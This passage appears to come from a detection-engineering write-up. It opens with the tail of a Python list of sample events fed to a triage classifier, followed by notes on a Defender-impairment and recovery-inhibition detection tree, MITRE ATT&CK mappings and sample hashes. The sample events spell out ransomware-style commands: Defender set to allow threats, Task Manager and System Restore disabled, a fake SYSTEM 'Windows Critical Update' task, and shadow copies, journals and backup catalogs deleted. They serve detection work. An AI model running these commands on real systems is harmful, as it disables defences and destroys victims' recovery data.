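    (920, 'reg add "HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\Windows Defender\\Threats\\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f'),
    (2828, 'reg add "HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\Windows Defender\\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f'),
    (2144, 'reg add "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f'),
    (2316, 'reg add "HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\Windows NT\\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f'),
    (672, 'SCHTASKS.exe /Create /RU "NT AUTHORITY\\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\\Users\\Admin\\AppData\\Local\\Temp\\f6beb4d776b2d8bdae01fd9adb00c7ef9c5f4583dade9b006426acbf5790cdd4.exe" /F'),
    (2252, 'vssadmin resize shadowstorage /for=C:\\ /on=C:\\ /maxsize=401MB'),
    (1664, 'vssadmin.exe Delete Shadows /all /quiet'),
    (1740, 'bcdedit /set {default} recoveryenabled No'),
    (1564, 'fsutil.exe usn deletejournal /D C:'),
    (1776, 'wbadmin.exe delete catalog -quiet'),
    (2232, 'schtasks.exe /Change /TN "\\Microsoft\\Windows\\SystemRestore\\SR" /disable'),
]

if __name__ == "__main__":
    print(*triage(SAMPLE_EVENTS)[0], sep="\n")
```

Two points the tree makes that the classifier preserves: the four reg add calls that set Low, Medium, High and Severe to 6 turn Defender's default action for every severity into Allow, which is why they are bucketed as defence impairment rather than generic registry changes; and the vssadmin resize shadowstorage to 401MB is already a recovery-inhibition step on its own, since capping the store evicts existing shadow copies, so a detection should not wait for the later Delete Shadows /all /quiet.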
Network
MITRE ATT&CK Enterprise v15
Persistence
- Boot or Logon Autostart Execution (1)
  - Registry Run Keys / Startup Folder (1)
- Create or Modify System Process (1)
  - Windows Service (1)
- Scheduled Task/Job (1)
Privilege Escalation
- Abuse Elevation Control Mechanism (1)
  - Bypass User Account Control (1)
- Boot or Logon Autostart Execution (1)
  - Registry Run Keys / Startup Folder (1)
- Create or Modify System Process (1)
  - Windows Service (1)
- Scheduled Task/Job (1)
Defense Evasion
- Abuse Elevation Control Mechanism (1)
  - Bypass User Account Control (1)
- Impair Defenses (2)
  - Disable or Modify Tools (2)
- Indicator Removal (3)
  - File Deletion (3)
- Modify Registry (4)
Downloads
- Filesize 1KB
  MD5    95313fd620bce5605891e3b417d31f59
  SHA1   00822740b99531f12be897a467a5536643b63880
  SHA256 44c6c8ffa23e2b90875abf879823c7554eebffcfc0f3ef5faab4dbfe51b2d069
  SHA512 b0d5fe70012ce01b7c44ecfa6f305ea8bf11e894402e92a46c619173d4c04e819c97aaa8600ec92e65c6b076b15bfad8b28ec391a811f9b0bf3fafacd5960bf7
- Filesize 12KB
  MD5    2fc8fe66aefb4ed4545dbbc4f235323a
  SHA1   d8351431c80b1fe1e8fc2e8d95afdb1b35d9dc64
  SHA256 3ad715fdbaa522fba0a60e636251ed0c74e9689ba30fd45c564f2aa4f4e15e17
  SHA512 5775db7b5c62c17736386389d38405e8f374cd9995a22012d2aa9e1d4a0afccb9eda35a1d30ddc09309b43ef54488803d598fc37309c6b35d1fd2fff3a111a50
- Filesize 684B
  MD5    dc33aa06c7e914716f86dc1b4d81c244
  SHA1   60d056cca3c7eaea98a6adf1b4768d3dd345fe20
  SHA256 ba6f71cf537dcde77536b525a3550161044cddabeeb50c45adb5db5de39c097f
  SHA512 89fbab9d59160776caeacc8feebeed01f9b3bc3136d798bea887a368a86c3c7121f4b0dbd48396ddb746e384f7cdf5f2aab76396b1b48f01e93be5e52d53f269